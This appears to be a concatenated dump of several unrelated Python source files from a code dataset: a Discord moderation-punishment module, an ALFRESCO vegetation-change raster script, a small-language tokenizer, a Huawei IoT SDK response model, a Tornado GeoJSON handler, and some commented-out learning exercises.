extract_amount_and_unit(argument) -> Tuple[int, str, str]:\n \"\"\"A simple input parser to get amount, unit and reason from a command string\"\"\"\n argument = argument.split()\n\n if argument[0].isnumeric() and argument[1] in UNITS:\n command_amount, command_unit = int(argument[0]), argument[1]\n command_reason = (\n get_random_reason() if len(argument) == 2 else \" \".join(argument[2:])\n )\n\n else:\n command_amount = DEFAULT_PUNISHMENT_AMOUNT\n command_unit = DEFAULT_PUNISHMENT_UNIT\n command_reason = \" \".join(argument)\n\n return command_amount, command_unit, command_reason\n\n\ndef translate_to_datetime(amount: int, unit: str) -> datetime.datetime:\n \"\"\"Translates user input into a datetime object\"\"\"\n if unit in [\"days\", \"day\"]:\n return datetime.datetime.now() + datetime.timedelta(days=amount)\n elif unit in [\"hours\", \"hour\"]:\n return datetime.datetime.now() + datetime.timedelta(hours=amount)\n elif unit in [\"minutes\", \"minute\", \"min\"]:\n return datetime.datetime.now() + datetime.timedelta(minutes=amount)\n else:\n raise TypeError(\"Can't translate to datetime\")\n\n\n@dataclass(frozen=True)\nclass Punishment(ABC):\n to_punish: discord.Member\n punished_by: discord.Member\n\n reason: str = get_random_reason()\n\n @property\n @classmethod\n @abstractmethod\n def punishment_id(cls) -> PunishmentID:\n raise NotImplementedError\n\n @property\n @classmethod\n @abstractmethod\n def action(cls) -> str:\n raise NotImplementedError\n\n @classmethod\n @abstractmethod\n async def convert(cls, ctx, argument) -> Punishment:\n raise NotImplementedError\n\n @abstractmethod\n async def punish(self, ctx: commands.Context) -> None:\n raise NotImplementedError\n\n @abstractmethod\n def encode_to_mongo(self) -> dict:\n raise NotImplementedError\n\n\n@dataclass(frozen=True)\nclass OneTimePunishment(Punishment, ABC):\n def encode_to_mongo(self) -> dict:\n return {\n \"registry\": {\n \"user_id\": self.to_punish.id,\n \"punishment_id\": 
self.punishment_id.value,\n \"reason\": self.reason,\n \"punished_by\": self.punished_by.id,\n }\n }\n\n @classmethod\n async def convert(cls, ctx: commands.Context, argument) -> OneTimePunishment:\n to_punish = ctx.args[2]\n return cls(\n to_punish=to_punish,\n punished_by=ctx.author,\n reason=argument,\n )\n\n\n@dataclass(frozen=True)\nclass TimedPunishment(Punishment, ABC):\n amount: int = DEFAULT_PUNISHMENT_AMOUNT\n unit: str = DEFAULT_PUNISHMENT_UNIT\n\n created_at: datetime.datetime = datetime.datetime.now()\n expires: datetime.datetime = field(init=False)\n\n def __post_init__(self):\n object.__setattr__(\n self, \"expires\", translate_to_datetime(self.amount, self.unit)\n )\n\n @classmethod\n @abstractmethod\n async def unpunish(cls, user_id: int, bot: Bot) -> None:\n raise NotImplementedError\n\n @classmethod\n async def convert(cls, ctx: commands.Context, argument) -> TimedPunishment:\n to_punish = ctx.args[2]\n\n amount, unit, reason = extract_amount_and_unit(argument)\n return cls(\n to_punish=to_punish,\n amount=amount,\n unit=unit,\n reason=reason,\n punished_by=ctx.author,\n )\n\n def encode_to_mongo(self) -> dict:\n return {\n \"registry\": {\n \"user_id\": self.to_punish.id,\n \"punishment_id\": self.punishment_id.value,\n \"reason\": self.reason,\n \"punished_by\": self.punished_by.id,\n \"duration\": f\"{self.amount} {self.unit}\",\n \"expires_at\": self.expires,\n },\n \"active\": {\n \"user_id\": self.to_punish.id,\n \"punishment_id\": self.punishment_id.value,\n \"expires_at\": self.expires,\n },\n }\n\n\nclass WarnPunishment(OneTimePunishment):\n punishment_id = PunishmentID.WARN\n action = \"warned\"\n\n async def punish(self, ctx: commands.Context) -> None:\n await ctx.send(\n f\"{self.to_punish.mention} you are being warned for {self.reason}\"\n )\n\n\n@dataclass(frozen=True)\nclass MutePunishment(TimedPunishment):\n punishment_id = PunishmentID.MUTE\n action = \"muted\"\n\n async def punish(self, ctx: commands.Context) -> None:\n 
muted_role = await self.get_muted_role(ctx.guild)\n\n await self.to_punish.add_roles(muted_role)\n\n @classmethod\n async def unpunish(cls, user_id: int, bot: Bot) -> None:\n try:\n member = await (await bot.the_guild).fetch_member(user_id)\n except discord.errors.NotFound:\n await bot.admin_log(\n f\"Failed to lift punishment\\n\"\n f\" Error : user <{user_id}> is no longer present in the server\"\n )\n else:\n muted_role = await cls.get_muted_role(await bot.the_guild)\n await member.remove_roles(muted_role)\n\n await bot.admin_log(f\"Unpunished user <{user_id}> ({member.display_name})\")\n\n @staticmethod\n async def get_muted_role(guild: discord.Guild) -> discord.Role:\n roles = await guild.fetch_roles()\n return get(roles, id=Roles.MUTED.value)\n\n\n@dataclass(frozen=True)\nclass KickPunishment(OneTimePunishment):\n punishment_id = PunishmentID.KICK\n action: str = \"kicked\"\n\n async def punish(self, ctx: commands.Context) -> None:\n await self.to_punish.kick()\n\n\n@dataclass(frozen=True)\nclass BanPunishment(TimedPunishment):\n punishment_id = PunishmentID.BAN\n action = \"banned\"\n\n async def punish(self, ctx: commands.Context) -> None:\n await self.to_punish.ban(reason=self.reason)\n\n @classmethod\n async def unpunish(cls, user_id: int, bot: Bot) -> None:\n user = await bot.fetch_user(user_id)\n await (await bot.the_guild).unban(user)\n\n await bot.admin_log(f\"Unpunished user <{user_id}> ({user.display_name})\")\n\n\n@dataclass(frozen=True)\nclass PermaBanPunishment(OneTimePunishment):\n punishment_id = PunishmentID.PERMABAN\n action = \"perma banned\"\n\n async def punish(self, ctx: commands.Context) -> None:\n await self.to_punish.ban(reason=self.reason)\n\n\ntimed_punishment_from_id = {\n \"MUTE\": MutePunishment,\n \"BAN\": BanPunishment,\n}\n\n__all__ = [\n \"WarnPunishment\",\n \"MutePunishment\",\n \"KickPunishment\",\n \"BanPunishment\",\n \"PermaBanPunishment\",\n \"GENERIC_REASONS\",\n \"timed_punishment_from_id\",\n \"Punishment\",\n 
\"PunishmentID\",\n]\n","sub_path":"src/cogs/server_management/punishments.py","file_name":"punishments.py","file_ext":"py","file_size_in_byte":7757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"382307019","text":"# # calculate vegetation resilience counts through time\ndef get_rep_num( x ):\n\t'''return rep number from firescar filename'''\n\tbase = os.path.basename( x )\n\treturn base.split( '_' )[ 1 ]\ndef count_transitions( arr_list ):\n\t''' \n\ttakes list of numpy ndarrays of integers and returns the number of \n\tshifts in values in the series. arr_list is expected to be in \n\tchronological order.\n\t'''\n\timport numpy as np\n\tarr_list = np.array([ np.where( arr != 0, 1, 0 ) for arr in np.diff( np.array( arr_list ), axis=0 ) ])\n\treturn np.sum( arr_list, axis=0 )\ndef open_raster( fn, band=1 ):\n\t''' remove mem leaks from stale file handles '''\n\timport rasterio\n\twith rasterio.open( fn ) as out:\n\t\tarr = out.read( band )\n\treturn arr\ndef relative_veg_change( veg_list, ncpus=32 ):\n\t'''\n\topens list of vegetation filenames into 2-d numpy\n\tndarrays and counts the number of transitons in vegetation \n\toccur by pixel through the series. \n\tArguments:\n\t\tveg_list:[list] list of paths to the vegetation output files\n\t\t\t\t\tfrom the ALFRESCO Fire Model. 
* expects filenames in \n\t\t\t\t\tchronological order *\n\tReturns:\n\t\t2-D numpy.ndarray of transition counts across the list of \n\t\tfilenames passed.\n\t'''\n\tarr_list = mp_map( open_raster, veg_list, nproc=ncpus )\n\treturn count_transitions( arr_list )\ndef main( args ):\n\t'''\n\trun relative flammability with the input args dict from argparse\n\t'''\n\timport numpy as np\n\n\tdirname, basename = os.path.split( args.output_filename )\n\tif not os.path.exists( dirname ):\n\t\tos.makedirs( dirname )\n\n\t# list, sort, group by replicate\n\tveg_list = [ os.path.join( root, fn ) for root, subs, files in os.walk( args.maps_path ) for fn in files if 'Veg_' in fn and fn.endswith( '.tif' ) ]\n\tyear_list = range( args.begin_year, args.end_year + 1 )\n\tveg_list = [ i for i in veg_list if int( os.path.basename( i ).split('_')[ len( os.path.basename( i ).split( '_' ) )-1 ].split( '.' )[0] ) in year_list ]\n\tveg_sorted = sorted( veg_list, key=lambda x: get_rep_num( x ) )\n\tveg_grouped = [ list( g ) for k, g in groupby( veg_sorted, key=lambda x: get_rep_num( x ) ) ]\n\t\n\t# calculate relative vegetation change -- parallel\n\t# final = mp_map( relative_veg_change, veg_grouped, nproc=int( args.ncpus ) )\n\tfinal = [ relative_veg_change( v, int(args.ncores) ) for v in veg_grouped ]\n\tfinal = np.sum( final, axis=0 ) / np.float( len(veg_list) )\n\n\t# set dtype to float32 and round it\n\tfinal = final.astype( np.float32 )\n\tfinal = np.around( final, 4 ) \n\n\t# mask the data with the out-of-bounds of Veg --> 255\n\twith rasterio.open( veg_list[0] ) as rst:\n\t\tarr = rst.read(1)\n\t\tfinal[ arr == 255 ] = -9999\n\n\t# write it out\n\tmeta = rasterio.open( veg_list[ 0 ] ).meta\n\tmeta.update( compress='lzw', dtype=np.float32, crs={ 'init':'EPSG:3338' }, nodata=-9999 )\n\t# output_filename = os.path.join( args.output_path, 'alfresco_relative_vegetation_change_counts_' + args.model + '_' + args.scenario + '_' + str(args.begin_year) + '_' + str(args.end_year) + '.tif' 
)\n\twith rasterio.open( args.output_filename, 'w', **meta ) as out:\n\t\tout.write( final, 1 )\n\treturn args.output_filename\n\nif __name__ == '__main__':\n\tfrom itertools import groupby\n\timport glob, os, sys, re, rasterio\n\tfrom pathos.mp_map import mp_map\n\timport numpy as np\n\timport scipy as sp\n\timport argparse\n\n\tparser = argparse.ArgumentParser( description='program to calculate Relative Flammability from ALFRESCO' )\n\tparser.add_argument( '-p', '--maps_path', action='store', dest='maps_path', type=str, help='path to ALFRESCO output Maps directory' )\n\tparser.add_argument( '-o', '--output_filename', action='store', dest='output_filename', type=str, help='path to output directory' )\n\tparser.add_argument( '-nc', '--ncores', action='store', dest='ncores', type=int, help='number of cores' )\n\tparser.add_argument( '-by', '--begin_year', action='store', dest='begin_year', type=int, help='beginning year in the range' )\n\tparser.add_argument( '-ey', '--end_year', action='store', dest='end_year', type=int, help='ending year in the range' )\n\n\targs = parser.parse_args()\n\t_ = main( args )\n","sub_path":"bin/alfresco_relative_vegetation_change.py","file_name":"alfresco_relative_vegetation_change.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"378508320","text":"#\r\n#\r\n#使用while编程实现求n-m以内的数的和!\r\nsum = 0\r\nprint(\"可以求出n到m以内所有数的和\")\r\nn = int(input(\"请输入n\"))\r\nm = int(input(\"请输入m\"))\r\nwhile n\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following 
conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport sys, utils\nfrom consts import *\n\nclass token:\n def __init__ (self, token_type, value, line):\n self.type = token_type\n self.value = value\n self.line = line\n\ndef get_token_type (name):\n if utils.is_bool (name):\n return TOKEN_VALUE_BOOL\n elif utils.is_int (name) or utils.is_hex (name):\n return TOKEN_VALUE_INT\n elif utils.is_float (name):\n return TOKEN_VALUE_FLOAT\n\n return TOKEN_NAME\n\ndef print_tokens (tokens):\n print (\"Type\\tValue\")\n\n for token in tokens:\n print (token_names[token.type] + \"\\t\" + token.value)\n\ndef tokenize (code):\n name = \"\"\n is_str = False\n is_comment = False\n ignore_newline = False\n line = 1\n\n tokens = []\n\n it = 0\n while it < len (code):\n char = code [it]\n if char == '\\n':\n line += 1\n\n if is_comment:\n if char == '\\n':\n is_comment = False\n elif is_str:\n if char == '\\\"':\n tokens.append (token (TOKEN_VALUE_STR, name, line))\n name = \"\"\n is_str = False\n elif char == '\\\\':\n it += 1\n char = code [it]\n if char == '\\\\':\n name += '\\\\'\n elif char == 'n':\n name += '\\n'\n elif char == 't':\n name += '\\t'\n elif char == 'r':\n name += '\\r'\n elif char == '\\\"':\n name += '\\\"'\n else:\n name += char\n else:\n if char in \" \\n\\t()[]{}\\\\\\\"#;\":\n if name != \"\":\n tokens.append (token (get_token_type (name), name, line))\n name = \"\"\n\n if char == 
'(':\n tokens.append (token (TOKEN_P_OPEN, \"\", line))\n elif char == ')':\n tokens.append (token (TOKEN_P_CLOSED, \"\", line))\n elif char == '[':\n tokens.append (token (TOKEN_L_OPEN, \"\", line))\n elif char == ']':\n tokens.append (token (TOKEN_L_CLOSED, \"\", line))\n elif char == '{':\n tokens.append (token (TOKEN_A_OPEN, \"\", line))\n elif char == '}':\n tokens.append (token (TOKEN_A_CLOSED, \"\", line))\n elif char == '\\\"':\n is_str = True\n elif char == '\\\\':\n it += 1\n char = code [it]\n\n if char == '\\\\':\n it += 1\n char = code [it]\n if char == '\\\\':\n tokens.append (token (TOKEN_VALUE_CHAR, '\\\\', line))\n elif char == 'n':\n tokens.append (token (TOKEN_VALUE_CHAR, '\\n', line))\n elif char == 't':\n tokens.append (token (TOKEN_VALUE_CHAR, '\\t', line))\n elif char == 'r':\n tokens.append (token (TOKEN_VALUE_CHAR, '\\r', line))\n elif char == 's':\n tokens.append (token (TOKEN_VALUE_CHAR, ' ', line))\n elif char == '\\\"':\n tokens.append (token (TOKEN_VALUE_CHAR, '\\\"', line))\n else:\n print (\"Tokenizer Error: Expected '\\\\', 'n', 't', 's' or 'r' after \\\\\\\\\")\n sys.exit ()\n else:\n tokens.append (token (TOKEN_VALUE_CHAR, char, line))\n\n elif char == '#' or char == ';':\n is_comment = True\n else:\n name += char\n it += 1\n\n if name != \"\":\n tokens.append (token (get_token_type (name), name, line))\n name = \"\"\n\n return tokens\n","sub_path":"src/compiler_py/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"25286373","text":"# coding: utf-8\n\nimport six\n\nfrom huaweicloudsdkcore.sdk_response import SdkResponse\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass AddCertificateResponse(SdkResponse):\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute 
name\n and the value is json key in definition.\n \"\"\"\n sensitive_list = []\n\n openapi_types = {\n 'certificate_id': 'str',\n 'cn_name': 'str',\n 'owner': 'str',\n 'status': 'bool',\n 'verify_code': 'str',\n 'create_date': 'str',\n 'effective_date': 'str',\n 'expiry_date': 'str'\n }\n\n attribute_map = {\n 'certificate_id': 'certificate_id',\n 'cn_name': 'cn_name',\n 'owner': 'owner',\n 'status': 'status',\n 'verify_code': 'verify_code',\n 'create_date': 'create_date',\n 'effective_date': 'effective_date',\n 'expiry_date': 'expiry_date'\n }\n\n def __init__(self, certificate_id=None, cn_name=None, owner=None, status=None, verify_code=None, create_date=None, effective_date=None, expiry_date=None):\n \"\"\"AddCertificateResponse\n\n The model defined in huaweicloud sdk\n\n :param certificate_id: CA证书ID,在上传CA证书时由平台分配的唯一标识。\n :type certificate_id: str\n :param cn_name: CA证书CN名称。\n :type cn_name: str\n :param owner: CA证书所有者。\n :type owner: str\n :param status: CA证书验证状态。true代表证书已通过验证,可进行设备证书认证接入。false代表证书未通过验证。\n :type status: bool\n :param verify_code: CA证书验证码。\n :type verify_code: str\n :param create_date: 创建证书日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n :type create_date: str\n :param effective_date: CA证书生效日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n :type effective_date: str\n :param expiry_date: CA证书失效日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n :type expiry_date: str\n \"\"\"\n \n super(AddCertificateResponse, self).__init__()\n\n self._certificate_id = None\n self._cn_name = None\n self._owner = None\n self._status = None\n self._verify_code = None\n self._create_date = None\n self._effective_date = None\n self._expiry_date = None\n self.discriminator = None\n\n if certificate_id is not None:\n self.certificate_id = certificate_id\n if cn_name is not None:\n self.cn_name = cn_name\n if owner is not None:\n self.owner = owner\n if status is not None:\n self.status = status\n if verify_code is not None:\n self.verify_code = verify_code\n if create_date 
is not None:\n self.create_date = create_date\n if effective_date is not None:\n self.effective_date = effective_date\n if expiry_date is not None:\n self.expiry_date = expiry_date\n\n @property\n def certificate_id(self):\n \"\"\"Gets the certificate_id of this AddCertificateResponse.\n\n CA证书ID,在上传CA证书时由平台分配的唯一标识。\n\n :return: The certificate_id of this AddCertificateResponse.\n :rtype: str\n \"\"\"\n return self._certificate_id\n\n @certificate_id.setter\n def certificate_id(self, certificate_id):\n \"\"\"Sets the certificate_id of this AddCertificateResponse.\n\n CA证书ID,在上传CA证书时由平台分配的唯一标识。\n\n :param certificate_id: The certificate_id of this AddCertificateResponse.\n :type certificate_id: str\n \"\"\"\n self._certificate_id = certificate_id\n\n @property\n def cn_name(self):\n \"\"\"Gets the cn_name of this AddCertificateResponse.\n\n CA证书CN名称。\n\n :return: The cn_name of this AddCertificateResponse.\n :rtype: str\n \"\"\"\n return self._cn_name\n\n @cn_name.setter\n def cn_name(self, cn_name):\n \"\"\"Sets the cn_name of this AddCertificateResponse.\n\n CA证书CN名称。\n\n :param cn_name: The cn_name of this AddCertificateResponse.\n :type cn_name: str\n \"\"\"\n self._cn_name = cn_name\n\n @property\n def owner(self):\n \"\"\"Gets the owner of this AddCertificateResponse.\n\n CA证书所有者。\n\n :return: The owner of this AddCertificateResponse.\n :rtype: str\n \"\"\"\n return self._owner\n\n @owner.setter\n def owner(self, owner):\n \"\"\"Sets the owner of this AddCertificateResponse.\n\n CA证书所有者。\n\n :param owner: The owner of this AddCertificateResponse.\n :type owner: str\n \"\"\"\n self._owner = owner\n\n @property\n def status(self):\n \"\"\"Gets the status of this AddCertificateResponse.\n\n CA证书验证状态。true代表证书已通过验证,可进行设备证书认证接入。false代表证书未通过验证。\n\n :return: The status of this AddCertificateResponse.\n :rtype: bool\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status):\n \"\"\"Sets the status of this AddCertificateResponse.\n\n 
CA证书验证状态。true代表证书已通过验证,可进行设备证书认证接入。false代表证书未通过验证。\n\n :param status: The status of this AddCertificateResponse.\n :type status: bool\n \"\"\"\n self._status = status\n\n @property\n def verify_code(self):\n \"\"\"Gets the verify_code of this AddCertificateResponse.\n\n CA证书验证码。\n\n :return: The verify_code of this AddCertificateResponse.\n :rtype: str\n \"\"\"\n return self._verify_code\n\n @verify_code.setter\n def verify_code(self, verify_code):\n \"\"\"Sets the verify_code of this AddCertificateResponse.\n\n CA证书验证码。\n\n :param verify_code: The verify_code of this AddCertificateResponse.\n :type verify_code: str\n \"\"\"\n self._verify_code = verify_code\n\n @property\n def create_date(self):\n \"\"\"Gets the create_date of this AddCertificateResponse.\n\n 创建证书日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n\n :return: The create_date of this AddCertificateResponse.\n :rtype: str\n \"\"\"\n return self._create_date\n\n @create_date.setter\n def create_date(self, create_date):\n \"\"\"Sets the create_date of this AddCertificateResponse.\n\n 创建证书日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n\n :param create_date: The create_date of this AddCertificateResponse.\n :type create_date: str\n \"\"\"\n self._create_date = create_date\n\n @property\n def effective_date(self):\n \"\"\"Gets the effective_date of this AddCertificateResponse.\n\n CA证书生效日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n\n :return: The effective_date of this AddCertificateResponse.\n :rtype: str\n \"\"\"\n return self._effective_date\n\n @effective_date.setter\n def effective_date(self, effective_date):\n \"\"\"Sets the effective_date of this AddCertificateResponse.\n\n CA证书生效日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n\n :param effective_date: The effective_date of this AddCertificateResponse.\n :type effective_date: str\n \"\"\"\n self._effective_date = effective_date\n\n @property\n def expiry_date(self):\n \"\"\"Gets the expiry_date of this AddCertificateResponse.\n\n 
CA证书失效日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n\n :return: The expiry_date of this AddCertificateResponse.\n :rtype: str\n \"\"\"\n return self._expiry_date\n\n @expiry_date.setter\n def expiry_date(self, expiry_date):\n \"\"\"Sets the expiry_date of this AddCertificateResponse.\n\n CA证书失效日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n\n :param expiry_date: The expiry_date of this AddCertificateResponse.\n :type expiry_date: str\n \"\"\"\n self._expiry_date = expiry_date\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n import simplejson as json\n if six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n def __repr__(self):\n \"\"\"For `print`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, AddCertificateResponse):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == 
other\n","sub_path":"huaweicloud-sdk-iotda/huaweicloudsdkiotda/v5/model/add_certificate_response.py","file_name":"add_certificate_response.py","file_ext":"py","file_size_in_byte":10162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"498521546","text":"import os\n\nimport tornado.web\nfrom torlite.core.base_handler import BaseHandler\nfrom torlite.model.muser import MUser\n\nfrom maplet.model.json_model import MJson\nfrom torlite.core import tools\n\nimport pickle\nimport json\n\n\nclass GeoJsonHandler(BaseHandler):\n def initialize(self):\n self.mjson = MJson()\n self.muser = MUser()\n if self.get_current_user():\n self.userinfo = self.muser.get_by_id(self.get_current_user())\n else:\n self.userinfo = None\n\n def get(self, url_str=''):\n if len(url_str) > 0:\n url_arr = url_str.split('/')\n\n if len(url_arr) == 1:\n rec = self.mjson.get_by_id(url_str)\n\n # 这里主要是检查一下保存成了个什么鬼。结果还是差强人意。\n # print('=' * 50)\n # xx = json.dumps(rec.json, indent=1)\n # print(xx)\n # for xx in rec.json.keys():\n # print(rec.json[xx])\n # print('=' * 50)\n # print(rec.json)\n # print('=' * 50)\n if rec:\n return json.dump(rec.json, self)\n else:\n return False\n elif len(url_arr) == 2:\n if url_arr[0] == 'download':\n self.download(url_arr[1])\n if url_arr[0] == 'delete':\n self.delete(url_arr[1])\n\n @tornado.web.authenticated\n def delete(self, uid):\n self.mjson.delete_by_uid(uid)\n\n @tornado.web.authenticated\n def download(self, pa_str):\n\n uid = pa_str.split('_')[-1].split('.')[0]\n\n self.set_header('Content-Type', 'application/force-download')\n # self.set_header('Content-Disposition', 'attachment; filename=%s' % file_name)\n rec = self.mjson.get_by_id(uid)\n\n geojson = rec.json\n\n out_arr = []\n for key in geojson.keys():\n out_arr = out_arr + geojson[key]['features']\n\n out_dic = {\"type\": \"FeatureCollection\",\n \"features\": out_arr}\n\n if rec:\n return json.dump(out_dic, self)\n\n def post(self, 
url_str=''):\n\n if len(url_str) > 0:\n url_arr = url_str.split('/')\n if len(url_arr) == 2:\n if self.get_current_user():\n self.add_data(url_arr)\n else:\n self.set_status('403')\n return False\n else:\n self.set_status('403')\n return False\n\n @tornado.web.authenticated\n def add_data(self, url_arr):\n\n post_data = {}\n for key in self.request.arguments:\n post_data[key] = self.get_arguments(key)\n\n geojson_str = post_data['geojson'][0]\n\n xx = json.loads(geojson_str)\n\n out_dic = {}\n index = 0\n\n for x in xx['features']:\n bcbc = x['geometry']\n if 'features' in bcbc:\n # 判断是否是空的数据。空的数据保存到数据库,加载的时候,会出现问题。\n if bcbc['features'][0]['geometry']['coordinates'] in [[], [[None]]]:\n continue\n else:\n # 这里处理新加的数据。与已有的数据不一样。\n if bcbc['coordinates'] in [[], [[None]]]:\n continue\n\n bcbc = {'features': [{'geometry': bcbc,\n \"properties\": {},\n \"type\": \"Feature\"}],\n 'type': \"FeatureCollection\"}\n\n out_dic[index] = bcbc\n index = index + 1\n\n\n\n if len(url_arr[1]) == 4:\n uid = url_arr[1]\n return_dic = {'sig': ''}\n\n cur_info = self.mjson.get_by_id(uid)\n\n # 用户的数据,不以允许其他人保存。\n if cur_info.user.uid == self.userinfo.uid:\n pass\n else:\n return_dic['status'] = 0\n return json.dump(return_dic, self)\n else:\n uid = tools.get_uu4d()\n while self.mjson.get_by_id(uid):\n uid = tools.get_uu4d()\n return_dic = {'sig': uid}\n\n try:\n self.mjson.add_or_update(uid, self.userinfo.uid, url_arr[0], out_dic)\n return_dic['status'] = 1\n return json.dump(return_dic, self)\n except:\n self.set_status(400)\n return False\n","sub_path":"maplet/handlers/geojson.py","file_name":"geojson.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"289618475","text":"# # def main():\n# # f = None\n# # try:\n# # with open('致橡树.txt', 'r', encoding='utf-8') as f:\n# # print(f.read())\n# # except FileNotFoundError:\n# # print('无法打开指定的文件')\n# # except LookupError:\n# # 
print('指定了未知的编码')\n# # except UnicodeDecodeError:\n# # print('读取文件时解码错误')\n# # finally:\n# # if f:\n# # f.close()\n# #\n# #\n# # if __name__ == '__main__':\n# # main()\n#\n#\n# # import time\n# # #\n# # #\n# # # def main():\n# # # print('一次性读取整个文件')\n# # # with open('test.txt', 'r', encoding='utf-8') as f:\n# # # print(f.read())\n# # # print('for-in循环逐行读取')\n# # # with open('test.txt', mode='r') as f:\n# # # for line in f:\n# # # print(line, end='')\n# # # time.sleep(0.5)\n# # # print()\n# # # print('读取文件按行读取到列表中')\n# # # with open('test.txt') as f:\n# # # lines = f.readlines()\n# # # print(lines)\n#\n#\n# from math import sqrt\n# import json\n# import re\n#\n#\n# def is_prime(n):\n# assert n > 0\n# for factor in range(2, int(sqrt(n)) + 1):\n# if n % factor == 0:\n# return False\n# return True if n != 1 else False\n#\n#\n# def main():\n# # filenames = ('a.txt', 'b.txt', 'c.txt')\n# # fs_list = []\n# # try:\n# # for filename in filenames:\n# # fs_list.append(open(filename, 'w', encoding='utf-8'))\n# # for number in range(1, 10000):\n# # if is_prime(number):\n# # if number < 100:\n# # fs_list[0].write(str(number) + '\\n')\n# # elif number < 10000:\n# # fs_list[1].write(str(number) + '\\n')\n# # else:\n# # fs_list[2].write(str(number) + '\\n')\n# # except IOError as ex:\n# # print(ex)\n# # print('写文件时发生错误')\n# # finally:\n# # for fs in fs_list:\n# # fs.close()\n# # print('操作完成')\n#\n# # try:\n# # with open('logo.png', 'rb') as fs1:\n# # data = fs1.read()\n# # print(type(data))\n# # with open('copy.png', 'wb') as fs2:\n# # fs2.write(data)\n# # except FileNotFoundError as e:\n# # print('指定的文件打不开')\n# # except IOError as e:\n# # print('读写文件时出现错误')\n# # print('程序执行结束')\n# # mydict = {\n# # \"name\": \"rock\",\n# # \"age\": 12,\n# # \"qq\": 123456789,\n# # \"friend\": [\"asd\", \"ds\", \"cx\"],\n# # \"cars\":[\n# # {\"brand\": \"BYD\", \"max_speed\": 180},\n# # {\"brand\": \"Audi\", \"max_speed\": 280}\n# # ]\n# # }\n# # mydict2 = {\n# # \"name\": \"rock-2\",\n# # \"age\": 
12,\n# # \"qq\": 123456789,\n# # \"friend\": [\"asd\", \"ds\", \"cx\"],\n# # \"cars\": [\n# # {\"brand\": \"BYD\", \"max_speed\": 180},\n# # {\"brand\": \"Audi\", \"max_speed\": 280}\n# # ]\n# # }\n# # try:\n# # with open('data.json', 'w', encoding='utf-8') as fs:\n# # json.dump(mydict, fs)\n# # json.dump(mydict2, fs)\n# # except IOError as e:\n# # print(e)\n# # print('over')\n#\n#\n# username = input('请输入用户名:')\n# qq = input('请输入QQ号')\n# m1 = re.match(r'^[0-9a-zA-Z_]{6, 20}$', username)\n# if not m1:\n# print('请输入有效的用户名')\n# m2 = re.match(r'^[1-9]\\d{4,11}$', qq)\n# if not m2:\n# print('请输入有效的QQ号')\n# if m1 and m2:\n# print('你输入的信息是有效的')\n#\n#\n# if __name__ == '__main__':\n# main()\n\n#\n# from random import randint\n# from time import time, sleep\n# from multiprocessing import Process\n# from os import getpid\n# from threading import Thread\n#\n#\n# def download_task(filename):\n# print('开始下载%s...' % filename)\n# time_to_download = randint(5, 10)\n# sleep(time_to_download)\n# print('%s下载完成!耗费了%d秒' % (filename, time_to_download))\n#\n#\n# class DownloadTask(Thread):\n#\n# def __init__(self, filename):\n# super().__init__()\n# self._filename = filename\n#\n# def run(self):\n# print('开始下载%s...' 
